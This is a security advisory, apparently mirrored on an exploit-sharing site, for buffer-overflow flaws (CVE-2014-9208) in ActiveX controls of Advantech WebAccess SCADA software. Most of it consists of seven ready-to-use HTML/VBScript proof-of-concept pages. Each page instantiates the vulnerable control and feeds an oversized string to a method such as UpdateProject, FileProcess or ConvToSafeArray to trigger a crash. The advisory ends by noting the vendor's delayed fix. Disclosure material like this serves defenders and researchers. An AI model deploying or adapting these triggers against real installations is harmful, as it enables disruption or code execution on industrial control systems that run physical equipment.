扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 |
Introduction ********************************************************************************* Using Advantech WebAccess SCADA Software we can remotely manage Industrial Control systems devices like RTU's, Generators, Motors etc. Attackers can execute code remotely by passing maliciously crafted string to ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX. Operating System: Windows SP1 Affected Product: Advantech WebAccess 8.0, 3.4.3 Vulnerable Program: AspVCObj.dll CVE-2014-9208 ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX UpdateProject Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\webdobj.dll" prototype= "Sub UpdateProject ( ByVal WwwPort As String ,ByVal ProjName As String ,ByVal ProjIP As String ,ByVal ProjPort As Long ,ByVal ProjTimeout As Long ,ByVal ProjDir As String )" --> arg1="defaultV" arg2="defaultV" arg3=String(1044, "A") arg4=1 arg5=1 arg6="defaultV" target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 </script></html> </html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX InterfaceFilter Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Function InterfaceFilter ( ByVal Interface As String ) As String" --> arg1=String(1044, "A") target.InterfaceFilter arg1 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX FileProcess Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Sub FileProcess ( ByVal Type As Integer ,ByVal FileName As String )" --> arg1=1 arg2=String(1044, "A") target.FileProcess arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetWideStrCpy Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Function GetWideStrCpy ( ByVal Type As Integer ,ByVal inStr As String ) As String" --> arg1=1 arg2=String(1044, "A") target.GetWideStrCpy arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetRecipeInfo Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Function GetRecipeInfo ( ByVal Type As Integer ,ByVal filePath As String )" --> arg1=1 arg2=String(1044, "A") target.GetRecipeInfo arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetLastTagNbr Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Function GetLastTagNbr ( ByVal TagName As String ) As String" --> arg1=String(1044, "A") target.GetLastTagNbr arg1 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX ConvToSafeArray Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype= "Function ConvToSafeArray ( ByVal ArrSize As Integer ,ByVal inStr As String )" --> arg1=1 arg2=String(2068, "A") target.ConvToSafeArray arg1 ,arg2 </script></html> ********************************************************************************* Vulnerabilities were reported to Advantech sometime in January/February 2015, coordinated through CSOC.From April 2015 they has been postponing the fix. |
体验盒子
